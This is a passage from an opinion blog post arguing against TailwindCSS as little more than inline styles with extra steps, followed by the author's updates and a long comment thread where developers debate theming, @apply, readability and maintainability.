attributes on the base DOM node, then update state with the new values to ensure React's engine knows what's going on. // Piechart.js in <Arc> componentWillReceiveProps(newProps) { this.setState({ color: newProps.color }); d3 .select(this.refs.elem) .transition() .duration(80) .attrTween("d", arcTween(this.state.d, newProps.d, this.arc)) .on("end", () => this.setState({ d: newProps.d, pathD: this.arc(newProps.d) }) ); } We update color state right away. This triggers a render, eventually. Then we start an 80-millisecond transition that uses the arcTweengenerator we built earlier. When the transition ends, we update React state with the new values for d and pathD. This triggers another render. That might sound like a lot of renders, but it works okay. Don't worry about wasting resources, you're re-rendering a single <path> element. The DOM is pretty fast! Recap You learned how to build a silky animated smooth piechart with React and D3! Yay! In a nutshell: - Use custom tweens to transition complex shapes. - Render from state. - Always update state after transitions end. Party hard! To learn more about using React and D3 to write declarative data visualization code, read my book React+D3v4. I'm probably adding this as a new chapter. Crafter CMS is a modern Git-based platform for building innovative websites and content-rich digital experiences. Download this white paper now. Published at DZone with permission of Swizec Teller , DZone MVB. See the original article here. Opinions expressed by DZone contributors are their own. {{ parent.title || parent.header.title}} {{ parent.tldr }} {{ parent.linkDescription }}{{ parent.urlSource.name }}
https://dzone.com/articles/silky-smooth-piechart-transitions-with-react-and-d
CC-MAIN-2018-22
refinedweb
1,469
69.68
If you work in the front-end, you've probably heard a lot about TailwindCSS, a CSS library, much like Bootstrap. Much unlike Bootstrap, however, Tailwind takes a different approach - it is all "utility classes". And I am not a fan. I got a whiff of it and quickly learned the name is appropos: it was as welcome and useful as passed gas. Before we start, let me try to explain what a utility class is. Let's say that you have many components, and many of them need to have the CSS style property: "display: flex;". Instead of writing that over and over in your css, multiple times, instead you create a class called "flex" .flex { display: flex; } Then, in every component that needs to be flexed, you add that "flex" class. This is not a bad thing. I have written, and used utility classes a great deal myself, especially when I'm writing CSS without the aid of CSS-in-JS solutions or a preprocessor like Sass/SCSS. What Tailwind does is take that concept to the extreme, with the idea being that you almost never have to write CSS, you just write different classes based on what styles you need to apply. Which is an interesting choice, because... This is just inline styles with extra steps. That's it. Writing <div class="flex">foo</div> has the same exact effect as writing <div style="display: flex;">foo</div>. Well -- slightly different in that inline styles have higher priority than classes, but that's not really relevant in this context. So - with that in mind, with the exception of CSS prioritization, any argument you could make against using inline styles in your codebase is also an argument against using Tailwind. For example: Lifewire: Avoiding Inline Styles for CSS Design. Or StackOverflow: What's so bad about inline CSS?. Or LogRocket: Why you shouldn’t use inline styling in production React apps. I know it seems a bit lazy to rehash other users criticisms of inline styles to explain what's wrong with Tailwind, but it really is a 1-to-1 mapping. It's just inline styles with extra steps. Some of the problems Tailwind shares with inline styles: It's WET, not DRY. When you want to change your site styling in a major way, if you've used utility classes, you need to go through each use of those utility classes - that is, every component - and visually determine what needs to be updated. For example, let's say that your company's primary color is blue. You'll have lots of blue stuff in your website, marked with things like: "text-blue-500" or "bg-blue-300" to determine different shades of blue. And that's fine until your company decides to rebrand, and all of the buttons - but only the buttons - on the site need to be red. Now you have to go through each component and manually change "text-blue-500" to "text-red-500". And with 1000 edits comes 1000 oppertunities to introduce a bug. It is almost a textbook definition of why the DRY principle is in place. Alternatively, if you're using regular-old CSS, what you probably did is create a class called ".button". You can just go into that class and change a single line: "background-color: 'red';". Any element that uses that class definition will now be red. That brings us to the next point: HTML should only concern itself with the structure of your page, not the styling of the page. People talk about seperation of concerns a lot in development. CSS Modules (and especially .vue files) have done a lot to dispel the notion that you need to segregate structure, behavior, and style of the same basic building block of your site in seperate folders, but there is something to be said for seperating concerns. That is - each part of your code should be "loosely coupled and highly cohesive." In other words, your HTML (structure syntax) shouldn't have information about what the styles should be, it should only contain information about the structure of the page. Indeed, the ultimate reason for the invention of CSS, the whole point of the entire enterprise of CSS... was specifically so that you could seperate content from presentation. And the method for doing this is through the "class" attribute. The whole point of "class" is specifically that you can tell the computer what an element is - that is, describe an element's content. Once you've defined the content, then you just need to decide what content of that type should look like. This not only means that you can go and change how an element looks without worrying about the underlying structure of the page, but also means that you can use these classes to describe what an element is. Indeed, part of the reason for BEM's naming syntax is that BEM names not only tell you what the component is, but also what it's relationship to other components in the document is. Remember that when we write code, we write it for two audiences: the first is the computer itself, which doesn't care how the code looks so long as it runs, and the other is your fellow programmers. The easier it is for them to quickly identify what parts of your program are and how they interrelate, the more quickly that they can fix bugs, add features, and bring value to the organization. Which brings us to: It's hard to read If you look at some HTML with Tailwind in it, you might say to yourself that the HTML looks "busy" or even "ugly." That's true, but it's missing the point. Say what you will about inline styles, but they're at least providing enough context to let you know what's happening. Tailwind code is full of semantically obscure abbreviations; most of which are just redefinitions of already well known CSS properties. Worse still, when they're not redefinitions, they can become downright cryptic. Tailwind prefers to use prefixed class names instead of media queries. Here's an example from Aleksandr Hovhannisyan So this in Tailwind: > could be expressed as: <style> ; } } </style> <div class="thing">Yikes.</div> Now, the first example, I grant, is an awful lot less code to write, but look at how the second example is explictly defining height and width at specific breakpoints. It is verbose - as raw CSS usually happens to be, but there are other solutions - such as Sass/SCSS, or solutions such as Emotion, Styled Components, etc. which allow you to use much more terse syntax without losing the cohesive meaning behind it. Again, this is programmer 101. It's why senior developers get on junior developers for naming variables "const h = 10" instead of "const height = 10" Another reason why the latter is easier to read than the former - Tailwind's classes are arranged horizontally, while the CSS is written vertically. The wider text is, the harder it is for a reader's eyes to jump to the next line, and the harder it is to find the one particular word you're looking for in a wall of horizontal text. I bet your eyes started glazing over the second you saw the horizontal scroll bar on that Tailwind code sample, didn't they? You lose a lot of the features built into standard CSS I won't harp on this too much, but it should be pointed out that because Tailwind doesn't allow you to use the power of many of CSS's basic features. You can't chain selectors together, like so: .foo:focus, .foo:active, .foo:hover { /* css code */ } You can't use combinators. .foo p { /* all p that are decendants of a .foo */ } .foo > p { /* all p that are direct children of a .foo */ } .foo + p { /* all p that are directly -after- a .foo */ } .foo ~ p { /* all p that are siblings of a .foo */ } It solves a problem that doesn't exist. One of the craziest things is that there's an obvious limitation to Tailwind's utility-class paradigm. What happens if you want to group related styles together? Rarely is "display:flex;" used without "justify-content: {value}", for example. CSS allows you to group these styles together into (wait for it), classes. There's a tool for grouping related Tailwind classes together too. It's called @apply. It's special, non-standard syntax that goes in your CSS file (a directive) and allows you to string together a collection of tailwind classes and place them all under one class name. That is to say, completely defeating the purpose behind the utility-class paradigm. If you end up having to use @apply, then *why don't you just use normal, ordinary, conventional CSS, which is easier to read, understand, modify, and doesn't require special tooling or parsing. CSS syntax can be complex, but it's been pretty stable since the late 90s, and isn't going to radically change anytime soon. There's a very simple mental experiment I'd like to conduct with you. Imagine a world in which CSS was never developed, but something akin to Tailwind was. That is, webpages could only be styled through repeating these individual class names... presumably through using table tags for layout. (To give you an idea of how old I am, I used to code web pages as a summer job in my junior year of high school in 1996 - and we used a LOT of table tags.) If you could go from the limitations of Tailwind to CSS, wouldn't you consider that a quantum leap forward? Expressive syntax! Semantic naming! Style grouping! Selectors and combinators!. It would be like moving from Assembly to C for the first time. If so, why are we considering replacing CSS with something that does less, is more complex, creates bad quality codebases, and possibly ends up with massive vendor-lock in down the line? If you want better than CSS, there are already solutions. So a lot of the hype around Tailwind is that you can get rid of CSS. I know, everyone knows CSS can be hard to work with - especially if you have legacy codebases where the CSS wasn't written that well. But for the most part, there are other, better improvements on CSS that actually do make styling simpler. There's the various CSS-in-JS solutions that allow you to leverage the power of Javascript to create dynamic class definitions; there's preprocessers such as Sass/SCSS/LESS; there's linters like Stylelint; there's best-practices methods like BEM/SMACSS. Is there overhead in learning these technologies? Yes. Is there tooling that needs to be part of your build chain? Yes. But unlike Tailwind, all of these solutions actively provide a tangible benefit to your code -- which is something that Tailwind can't claim. It literally provides no value, and tons of problems. At the end of the day, what do you get for all these problems? What are you left with? You're basically left with a less readable, more complex version of inline styles, a coding technique that we've been trying to breed out of junior developers for the past decade or so. If you adopt Tailwind, it's going to provide problems for you and your team for years to come, and it's going to be hard to remove it. Updates based on the comments section. A few notes based on responses from the comments section. Why trash something if you don't like it? It's important to write about bad frameworks as much as it is to write about good ones, because of two reasons. First, is the John Stewart Mill argument of "the value of the wrongful idea" - that in making a (good faith) argument for something incorrect, one arrives at a more correct, more complete view by analysis and refutation. Ideas must be continually challenged lest they go stale. Indeed - "one who doesn't understand one's opponent's arguments does not understand one's own" is a maxim I try to apply. When I wrote this article, I tried to look for the good in Tailwind. Why do people like it? (They don't have to write css. They can put style info in their HTML. They can write terser code. It gives them power to do things they don't know how to do in css.) Once I knew why people liked it, I had a much better understanding of why I didn't. (It combines content and presentation. It makes things harder to maintain. The syntax is obscure. You lose the power to do things that you can do in css.) Second is that someone down the line is going to think: Hmm, should I add Tailwind to my app that has to be maintained by my team? And they're going to google "pros and cons of TailwindCSS". There will be plenty of articles explaining the pros. Here's one explaining the cons. Hopefully I've made a compelling argument not to use Tailwind so that future developers won't have to deal with it. You're being disrespectful to the people who like Tailwind. This isn't New Orleans Jazz. I don't like New Orleans Jazz, so I don't have to listen to it. I don't buy New Orleans Jazz albums. I am not in the habit of making detailed criticisms of what I feel to be the music compositional problems of New Orleans Jazz. But I have never had a team lead, product owner, or stakeholder come up to me and say: "For the next project, I'm thinking that everyone on the team has to learn how to appreciate and play New Orleans Jazz." Engineers and developers are often required to work with technology that they not only don't like, but which makes their work harder - often because decision makers either didn't care about the software's tradeoffs, or didn't know. Can't do much about the former, but we can do things about the latter. When team leaders are thinking about incorporating a new technology into their tech stack, they should look for blog posts like this one to help them evaluate whether or not it's worth a try. My thesis is not, as you seem to think, "I don't like Tailwind, and therefore YOU shouldn't like Tailwind either". That's a 12 year old's viewpoint of technology criticism. Rather my thesis is: "If you choose Tailwind for a mission critical application, you will end up making your job harder, your application more brittle, and your team, in the long-term, will suffer." But CSS has massive problems! It really does. And there are better solutions than plain CSS. But Tailwind isn't one of them. Say that in the 1990s, the only way to build a house was to bang nails in with a flat rock (CSS). And then, around the mid 2000s, a really smart guy invented "the hammer." (SCSS) It took adjusting, and you have to learn a new tool, but it did the job much better. Around the early to mid 2010s, another guy invented the nail gun (CSS-in-JS). It did a lot of the same stuff as a hammer, but you had to know how to use it. There were tradeoffs, but generally, people who chose to work with hammers or with nail-guns usually ended up okay. Many peoplee would often use a manual hammer when the manual hammer seemed appropriate, and the nail gun when they seemed to need it. And all was good in the world of carpentry. Then in 2017, someone came up to the carpenters and said: "Hey, see what happens when I do this!" and starts hammering in nails with the butt end of a loaded revolver (Tailwind). And it's supporters quickly point out how more effective it is at building houses than banging in rocks. "But it's a loaded gun. It might go off and shoot someone" "Hasn't happened to me yet." "Why don't you use a hammer? Or a nail gun?" "I don't like hammers or nail guns." "I can understand why you might not, but even if you used a rock, that would be safer in the long run." "But using a rock is so difficult and inefficient." "I'm not saying to use a rock. I'm saying that the hammer already solves the problems you have with the rock, but even the rock is a better tool for this than a loaded gun because it won't shoot anyone." "But I love my gun." "I guess it's alright if you use your gun on smaller projects on your own property, but..." "Nope, I'm the foreman. Everyone on the site is using loaded guns from now on, because they're awesome." Update: 9 May 2021 - Check out this blog post by Mykolas Mankevicius which attempts to rebut this article. I disagree, of course, but I think it adds to the debate, and if you're reading this deciding whether to use tailwind or not, you should hear what the "other side" of this issue has to say. Agree but think my writing style might be too abrasive? Check out Benoît Rouleau's take on this article entitled Tailwind CSS might not be for you Cher writes about some of the response this article has gotten and how it relates to our own unconcious bias in "Sexism, Racism, Toxic Positivity, and TailwindCSS" Discussion (222) Ah, if only there existed search and replace... Or just create a custom color palette in your Tailwind config called 'brand', set your colors and be done with it. If brand colors change, update the color palette - easy. Right, but branding is more than just color palettes. It's also - do we want the corners to be more round or less round on buttons. What if we want to have switch toggles instead of checkbox toggles? What if we want a specific page to look like a specific brand that isn't our main brand? (This happened with a client of ours which sold Louis-Vitton gear -- Louis-Vitton wouldn't allow them to sell LV stuff on the client's page unless the pages that they landed on were branded with Luis-Vitton's color scheme). Right, and Tailwind offers plenty of flexibility to manage these things via your config if required. It's not just a static set of a utility classes that cannot be altered without digging into the source - override the default border radius settings, or create your own presets for your brand if need be. The exact use case in your article and comment (branded button) is mentioned in their documentation somewhere (I distinctly recall reading it), and I'm sure they suggest creating your own branded button class using @apply. If your branded button border radius requirements change, update the class, if the new border radius is outside the presets, then extend the config and then update the class. If a specific client demands you brand their pages, then add a color palette for their brand, and make sure those components switch out brandfor client-brandwhere required? Tailwind certainly doesn't stop you from using colors outside their default palette - I've only ever used the provided colors for non-brand accenting (e.g. greens for success, reds for errors, etc) and the grays for text/borders. In regards to moving to switch toggles from checkbox toggles, you're likely going to adjust the layout of the component somewhat, or perhaps add an additional container element ensure things are aligned correctly - I've encountered this exact type of scenario many times over the years - more often than not, it's more than just a few lines of CSS. And if you're building a modern application, you'll likely have a checkbox component or at least a rudimentary template/partial to stay DRY - which will prevent the need to update every occurrence of that particular component across your application - again, something which I believe they touch on in their documentation. To be frank, I wasn't a fan of Tailwind at first, and I certainly don't think it's the "be-all and end-all" solution - but after using it on a few projects I've come to love what it offers out of the box (especially the font, text sizing defaults, colors for accenting, gray set, grid, gradients, screen breakpoints, space-between, etc) with the ability to extend/override anything I desire if the case arises. It's really allowed me (as a full stack developer building business applications) to start flowing without having to worry about any of aforementioned when I just want to get something clean, consistent and functional on the screen. With all that being said, if you're creating basic web sites, landing pages, marketing pages - or complex applications without a component framework - Tailwind probably isn't the solution you want. The problem is that the minute you start using @apply and using semantic classes again, you're moving outside of Tailwind's "utility classes" paradigm. Now - while I could argue that "you might as well just write out the CSS" there is some value to alternative syntaxes. There's all sorts of tools for transpiling non-standard code into standard code. Typescript -> Javascript, Coffescript -> Javascript, ES2015+ -> Babel -> ES5, Sass -> CSS, SCSS -> CSS, LESS -> CSS, Knex -> SQL... It would be an interesting -- and I think worthwhile! -- project that would use only @apply in CSS files and then transpile them (maybe with SCSS) into the appropriate CSS around the same time you're transpiling all those "$" prefixed variables, Sass functions, and "&" notation. If you want to have a tool that is designed to make @apply px-5shorthand for padding-left: 5rem;then that would be an interesting tool that wouldn't break semantic structure. padding-right: 5rem; I've had the same thought - and it's essentially what I've been playing around with on a Svelte project with Tailwind's JIT mode. All the component markup, script and style tags are self contained in their own .svelte files - using @apply in classes within the style tag. Certainly makes the mark up a lot easier to reason with when you have a lot of nested elements and many utility classes applied - I won't argue that fact. The only issues I can see are: 1) Each components generated CSS classes are included in their own style tag within the head element, so I'm not sure what sort of performance issues this might cause if you have a lot of components. 2) Any class used with @apply within the svelte components, gets marked as "used" by Tailwind and ends up being compiled into the stylesheet loaded on the page. So if you don't use those utility classes in the mark up (and only in classes), they are essentially dead weight. I'm sure neither issue would be difficult to resolve - either way, it's interesting none the less! See, and this is the problem with writing a very opinionated article without understanding it. Tailwind is trying to get you away from using the @apply method. They have mention that in multiple tweets, articles, and videos. Instead of @apply bg-blue-500 for your brand you can easily set a color theme of "brand" in your config then use your theme in the css. ie: .button { background-color: theme('bg-brand-500'); font-family: theme('fontFamily.brand'); ///and any other variable you have set in your tailwind config. } then you just change your tailwind.config when you need to and you are done. Same as using a sass variable etc. It's not that hard and completely follows a dry principle. A properly designed stylesheet tags an outer element with whatever the thing is. You then can assemble the object, and only light markup is needed for child elements because you can reach in with the stylesheet and control them. I had a job interview where they had "code standards" for doing css where you weren't allowed to nest tags to control them. Everything had to be top-level. Idiotic. When you are writing code with frameworks, it's easy to use the framework to be absolutely consistent about how the children are constructed, so the markup can be very minimal. It makes it easy to read when the css tags are only used when they actually control some behavior, and they read semantically rather than as named inline styles. Color is not a brand, after all. And that could be a "hack". You don't try to win. He seems to blame the tool rather than using a better methodology for writing a better style But that's just it. Search and replace will only search and replace based on text strings. Which is great if the only place you use "text-blue-500" is in components you want to change. That's the thing about utility classes - by definition, they're the same name everywhere you use them. So if you wanted to change "text-blue-500" to "text-red-500" in buttons -- and only buttons -- you'd have to find, and then manually look to see if it's a button before you replace it. On the other hand, if you have a .button class, or even better, a .branded-button class, you can just change it in one place. Find and Replace might be useful for changing variable names that are already fairly unique, such as from "my-button" to "branded-button" but it's not useful if you're trying to change, say, only some instances of "float-left" to "float-right". But this is exactly how you should be using Tailwind anyway. If you are applying utility classes all over your html to make your buttons then this is akin to using inline styling. The power of tailwind is that you have an entire set of utility classes that allow you to make small tweaks on the fly because your designer wanted this specific button to have juuuuust a bit more margin-top and be fullwidth at certain resolutions, but you can also continue writing CSS as normal. I see Tailwind as a utility. It's not there to replace CSS, but compliment your workflow so you can get on with building components. Anyway, judging by your article and your replies in the comments you've made up your mind about Tailwind and that's ok, but there are many developers that are in favour of it, myself included. Best of luck! I'm sure that you could use Tailwind that way, but at that point - why not just use small tweaks in inline styles instead of using Tailwind's classes? Inline styles also have the advantage of being higher CSS priority than class definitions, so you get exactly what you want right away. But then again, the problem with "if you use it this way" arguments is that they're different from "if you use it as intended." You can see from the Tailwind's own documentation that the intended purpose is to replace CSS. I'm not saying that utility classes aren't useful. I'm just saying that they shouldn't be used for everything. And they certainly shouldn't need all the tooling overhead that comes with tailwind. I don't know why you keep saying this is not how Tailwind is intended to be used. The page you linked to is titled "Utility First". I infer that to mean the expectation is you start with utilities, and move to something else if you need it. Practically every word on that page seems to back up that inference. Further down the page is a section titled "Why not just use inline styles?" which explains what they see as the advantages of utility classes over inline styles. You didn't even acknowledge their reasoning in your article. The section after that one is "Maintainability concerns". This is where they expressly state that using apply to group styles together is, actually, using it "as intended". Again, it seems clear to me Tailwind's intention is you would build styles using utility classes first. After some point, they completely expect you to group at least some of those utility classes into a "bigger" class. You seem to think this grouping completely negates the benefits of using utility classes, and that you might as well write it in CSS. The documentation page that discusses this in particular is Extracting Components. I'm always wary when somebody says a newer syntax is "hard to read". It's definitely possible to write code that is hard to read. But how can you say it's hard to read when you've spent years training your brain to parse some other syntax. Readibility is subjective with things like this. For example, I found the example line in your article pretty easy to read. The purpose of md:h-32and lg:h-64are actually more obvious to me than the media queries. But I do agree the long horizontal line harder to read. But you don't have to do it that way. I like your analogy of using single letter variables. But I don't think it's the same thing. These are just short forms of CSS properties. They are clear and documented. I'm not sold on Tailwind myself. But if your conclusion is that it "provides no value", I don't think you argued it that well. Eh... If that is your interpretation of Utility First, then I can't fault it. It wasn't mine, for a number of reasons, but you may have caught me out on an assumption I didn't know I was making. See, I thought that "Utility First" was referring to a coding philosophy, much like the philsophy of "Mobile First" -- you code for the mobile site first because the mobile site will always work on the full web-page, but not necessarily vice versa. Mostly, though, the reason why I don't think your interpretation is correct (Start with utility classes, then move away from them) is because almost every example on Tailwind's site is about how you can convert from semantic classes and CSS/SCSS to Tailwind Utility classes. If anything, Tailwind seems to suggest that CSS is a pain point that needs to be resolved and that utility classes are the solution. I agree that Tailwind might have use with rapid prototyping, but there's no real instruction on how to move from rapid prototyping to final product - You write Tailwind, you distribute Tailwind. I remember a similar argument from the author of Clojure about how Clojure (and other Lisp-like languages) were "hard to read." He said: "I don't know how to read German, that doesn't mean that things written in German are hard to read." But we can admit to ourselves that it is harder to learn certain languages than others, especially for an English speaker. And we can ask questions: Does this have a similar grammatical syntax? Does the language belong to the same family, does it have cognates and loan-words? Does it use the same sounds and tones? Is the alphabet the same? In the case of programming languages, we can ask similar questions: In this case, my criticism of Tailwind being "hard to read" deals primarily on the fact that the syntax is not expressive, and indeeds, chooses terseness over expressiveness. Back in the days of limited memory, sometimes a terse command was better than a long one, we still use "cd" for change-directory and "ls" for "list" in most Unix shells, but no such memory problems were at play here. It's also hard to read because it's embedded inside HTML, listed horizontally, rather than vertically. Now I'm not saying that it would be as hard to read as if we did styles in PDoublePrime but compared to the default of regular CSS, it makes it hard to read. Additionally, since you're no longer adding your own semantic class names to your HTML, it can be hard to tell by looking at the source exactly what element in the HTML code you're actually looking at when you debug it. Re: @tofraley At the risk of taking sides (trying not to as I don’t understand TailwindCSS enough), I will say this: Usually when I encounter situations like this, I’ll bring it up to the designer. When that happens, at least in our case, it’s usually a misunderstanding (but not always). For example: Only pointing this out since, on the development side, all too often I’ve found developers simply matching the comps precisely without first ensuring that the change was intentional and (in this case, accidentally) creating one offs that ultimately weren’t really intended. 😊 That's not true, you can use 'primary', 'secondary', etc. tailwindcss.com/docs/customizing-c... If you're relying on find/replace tools to make hundreds or thousands of edits to your codebase because of a change like this, it's still a problem. Everyone has seen (or caused) a scenario where a find/replace has gone wrong and replaced the wrong thing by accident, e.g. replacing "Arial" with "ArialBold", but accidentally creating instances of "ArialBoldBold" because your find-fu was off. However, if the code was following DRY principles, there would be very few instances that needed to be changed, so would be far more likely to be handled better. Not the point though. The point of CSS ,and/or SCSS for that matter, is too make styling more structured. If you need to do mass search/replace that might be a first cue. Naming it primary, secondary ect. would be a way to go instead. Use @apply and use same style everywhere. In react Vue we use components so we can just change style in one Component and it would work elsewhere. When you have a Button comp… Easy. Maybe variant:red is not a good approach. variant:primary problem solved. works also for all other comps. Don’t see the problem here from the author. @Ranieri Althoff, if you have never introduced an error via search-and-replace I salute you for your charmed life as a developer! if only all developers were careful enough to use search and replace responsibly We do we need constant values if we have search and replace... Then don’t use functions at all If only this was possible and such an easy change, you can't replace every instance of this in your app, what if it applies only to buttons/etc. The whole issue with the frontend community, in one comment. Well done. The author was referring to the number of code changes. With standard CC, you have to do the change in just one place. Search and replace does not work all the time, as sometime you have to apply logic to it. Maybe you want to update only 763 elements. In that case, you will still need to go one by one changing the class if you just put "button" in all of them. You shouldn't. If the class is .button, and the .button class is only defined once, then one change to the .button class definition in your css should apply to all items that have the .button class. I should have been clearer in my example by using something like ".branded-button" but you do see how you don't have to go in one by one, right? Because you're not changing what the class is named, only what the class does. You often create a component for these scenarios, making different button components and reusing them. This pattern follows DRY too and also gives you the tooling and productivity of tailwind. You assume you want to replace all instances of text-blue-500 A bold article to write seeing as how it seems Tailwind is the starchild of CSS these days. But, an article I think needed to be written. I share most of your views on Tailwind. I even tried to start a project from scratch using Tailwind because I thought "it's really popular and it looks really pretty - maybe I just need to buckle down and use it". It took me a few days until I came to your same conclusion - why don't I just use plain CSS (or in my case, SASS since I was already using it)? It seemed silly to write: when that's basically the same as: and yeah - it's a lot less clear exactly what's happening. In my book, clarity always trumps cleverness. The colour scheme is nice though, so I usually import it into my SASS files. To someone more familiar with raw css, then that's going to be more clear. After using tailwind for a few days that syntax starts to be easy to understand. I'd argue actually much easier to know what happening than long lists of cryptic css commands. A few: w-full width: 100%; w-screen width: 100vw; container: The container class sets the max-width of an element to match the min-width of the current breakpoint. How about a simple ring around a component? Use 'ring' In css: box-shadow: var(--tw-ring-inset) 0 0 0 calc(3px + var(--tw-ring-offset-width)) var(--tw-ring-color); ring-inset --tw-ring-inset: inset; All of this can be done using other libs and dependencies, but tailwind sure makes it easy. Even the things that Tailwind "simplifies" are made more complex, and "ring" is a perfect example. I'll admit, rings are difficult in CSS, which is why if I need to make one, I usually end up writing my own utility class for it. But even looking at "ring" you end up having to add 5 classes or more to get your ring styled the way you want it. So "ring" ends up being "ring-3 ring-blue-300 ring-opacity-50 ring-offset-0 ring-offset-red-500" by the time you actually use it. On the other hand, you could define all those into an actual utility CSS class, call it ".branded-ring" and just use that wherever you need it (instead of having that long string of five classes everywhere in your file.) Or even better, you could write branded-ring as a SCSS variable or a bit of styled component css`` code. If you use a CSS-in-JS solution, you could even have the color of the ring change according to props, giving you behavior control over style. And it would be more readable, more customizable, and then you don't have to worry about it. You would be able to write it once, and then your entire team could just import your code and reuse it - rather than every developer having to remember how to tailwind-style a ring every time they use that. Of course, rings aren't that difficult to do, because Google is a thing that exists, and there are a dozen websites which explains how exactly to do it. Of course, what happens when the CSS spec updates and rings are added due to popular demand? It happened with flexbox. It happened with css-grid. You never know. You can use @apply, which does the exact same thing. It allows you to make a single class .branded-ringwhile still leveraging Tailwind's classes. You can do that in things like Sass, too. It's not a benefit of Tailwind. But that's the point. It's not a good example of how using regular CSS (or pre processed CSS) is "better" in this case, it's not. I'm not sure I follow. I'm saying that having the same feature as an existing build process doesn't make the new one better, it makes it the same. I'm saying that the claim is that BMW make better cars than Ford because BMWs have four wheels. It's not a valuable claim in the original article. He doesn't like/use Tailwind as he doesn't see the benefit over using what he already does. That's fine and totally reasonable, but it's not an argument against Tailwind. His whole article is about how Tailwind is useless. Maybe to him it is, fine, no one argues that. But that doesn't make Tailwind useless in general. His examples are supposed to show how bad Tailwind is. It isn't. It just doesn't fit him or his way of writing CSS. Cool, absolutely nothing wrong with that, but again that didn't make Tailwind useless or bad in any way. lol same for that last thing I am coming up with a better solution. Working on it now. It's a criticism of an open source project, quite the opposite of a personal attack lol. Go and read the full article he attacked people who use Tailwind and expressed judgements. There is difference between constructive criticism n personal attack. everything in this world has pros and cons he could not provide any rationale arguments you can critisize and bash everything and if you think people who are using are fools then make a solution better than Tailwind. Enough is enough he expressed his thoughts I expressed mine I dont know him you dont know me lets lave this. @tanzimibthesam you can't on the one hand criticise Brian for writing an article against Tailwind and demand that he must provide a better solution before pointing out the problems with Tailwind, and then lambast him for doing exactly that. In the field of development, we should regularly challenge the de-facto ways of doing things, and always be asking if the tool/method/etc is really the best thing to use in a given scenario. It's how the entire industry moves forward. We can question and bring forth discussion about things with articles and posts like this one. You don't have to agree with it, but it shouldn't warrant personal attacks or profanity. He has to provide a better solution cause something is called personal criticism and one thing is called bashing and saying everyone is wrong who is using it.He is doing personal attacks and providing negative vibes. Stop defending this silly man. You dont know him and I dont know you or him neither nor he is providing a solution nor people are gonna stop using Tailwind. He doesn't actually have to provide a better solution to anything if he wants to write a post pointing out what he feels are problems with that thing. As for personal criticism, I can only go on what I saw on this whole thread. This involved him making some points that he felt were issues with Tailwind, and you throwing insults and profanity at him in replies. The only personal attacks I saw were from you. You're right in that I don't know him, I'm fairly impartial in this, although I do happen to agree with his criticisms of Tailwind. As for him providing a solution (as I've said, he has no requirement to do this, it's akin to a non-driver pointing out problems with a bad motorist, or a non-artist highlighting parts of an ugly painting), he did actually mention he was working on something (and provided a link), for which you attacked him again. Those comments of yours appear to be deleted now, so I can't provide exact quotes, but I believe you did mention his proposed linked solution was a waste of time, bloated, and pointless. Yup leave it man peace 😂 Not to re-open this, but I get a smug set of satisfaction from the fact that Airfoil has already been declared "bloated" despite the fact that A) it hasn't been written yet, B) the point of Airfoil is that you only really get value from about 9 of Tailwind's 300+ classes, so why not just write those nine in a way they can be reused and integrated? I understand putting so much of your identity into, say, a political movement that when someone makes criticisms of the political movement - no matter how valid - you feel personally attacked. But I don't understand how you can do this with a css framework. Amen For us web dev isn't massive part of our business and kicking media queries into the dark abyss was satisfying when moving to tailwind. A few things. I wish you luck, always fun to learn something new and see how the community can alter development. Interesting. I would say that even if web dev isn't a massive part of your business, then why would you want to deal with Tailwind anyway? You're not really skipping out on the bulk of complexity of CSS, you're just writing CSS using an alternative syntax that maps 1-to-1 to actual CSS. It doesn't make it any easier. Compare that to something like Bootstrap, which does make things like breakpoints, media queries, etc. easier. Yes, it's more opinionated, and "bootstrap sites look like bootstrap," but if web dev isn't a massive part of your business, then that's all you need. And while you can compile tailwind into CSS classes (with either Sass, as you mention, or @apply) -- why would you want to? Why not just write the class directly, skip the middleman? As for "container" - yes, it's easier to write 'container' than it is to fix max width at all media queries... the first time. But once you've done it once, it's easier to reuse. Now, if Tailwind were just a collection of commonly used CSS utility classes, I'd say that it has value, but "container" is a massive exception to the rule. 99% of tailwind is just one-to-one mappings of CSS properties. In fact, I'd be surprised if someone hasn't written a very stripped down version of Tailwind that is just a single CSS file with "container" and one or two other cherry picked utilities. If they haven't, I might write it myself. I work at a consultancy. The answer can be "very," depending on the client's whim. But aside from that, the main reason I might rewrite a style is because it's a bug fix, and in that case, I'd rather have to fix the bug in one place rather than fix it in 100. Yes, but it's not like Tailwind invented the 760 grid system. If all you want is to avoid writing media queries everywhere, there are already tons of great libraries for doing that. My problem isn't that there aren't some examples of good code out there in Tailwind. My problem is that it's 99% bad code, and the 1% of good code has been done, better, elsewhere. I'm not sure why tailwind is so divisive, I've not met anyone who thinks it's "okay", we either love it or hate it. Personally I love it and here's why: I've always hated external css files, or one monolithic global css file. Looking at some html and then spending 5 minutes trying to work out what ut looks like was always frustrating. Sometimes SoC isn't a such a good thing. You mention Vue, but Vue's SFCs were actually made to increase the coupling of your html/css/js! You can't do media queries with inline styles. Tailwind let's you abstract your units. This is one of the biggest pros for me. I can use a class like p-3 in multiple places, but if I decide I want bigger spacing, I can just update my tailwind config and all of my p-3 elements will update. You mention colors, but these are just tailwind's defaults. In reality you would configure tailwind to have primary and secondary colors, e.g. bg-primary-light. Then when your cpany decides to rebrand, it's super easy. If you don't like how you end up with super long class names, there are simple solutions. I use a simple concat library to split my classes into multiple lines. I group my classes either by breakpoint or by area (like all flex related classes) and it's really readable. On the same topic, if you're using something like react tailwind should actually encourage you to make more components. All of my tailwind classes are neatly tucked away in low level components. My application level components are incredibly terse and have no styles or classes on them. But the biggest win for someone like me, is I can just "get on". I don't have to worry about coming up with BEM names, or where to locate my styles, or how to keep spacing consistent, or compiling sass. I can work on the stuff I love (functionality) with the confidence that it will look good and consistent. That said, I get a lot of the reasons people don't "get" it. But if you were to join my team I'm afraid you'd just have to get over it! 🤣 I get it. I honestly think that Tailwind might be a good fit for you and your projects at this time. I actually think a better fit might be a more opinionated framework, such as purecss.io/ - but forget that for right now. If you are designing websites as a secondary consideration, if you're not comfortable with CSS, if you just want to "get on" with your structure and behavior, then maybe I can see it. In this type of scenario, I could see how Tailwind might be used as a rapid prototyping tool to try out different designs, but that once a design is settled upon, Tailwind code is rapidly stripped out and replaced with a more scalable, maintainable solution. If I were to join your team, yes, I'd get over it. I'm a professional - if my team lead were to go with Tailwind, I would explain my concerns, state that I believe it to be a large mistake, but at the end, follow the team lead. That's what you do. Make your case to the guy who makes the call, then follow the call. But if I was team lead, and one of my experienced senior engineers were telling me that a framework I was considering was completely worthless and would generate tons of technical debt for no appreciable value, I'd at least pause and 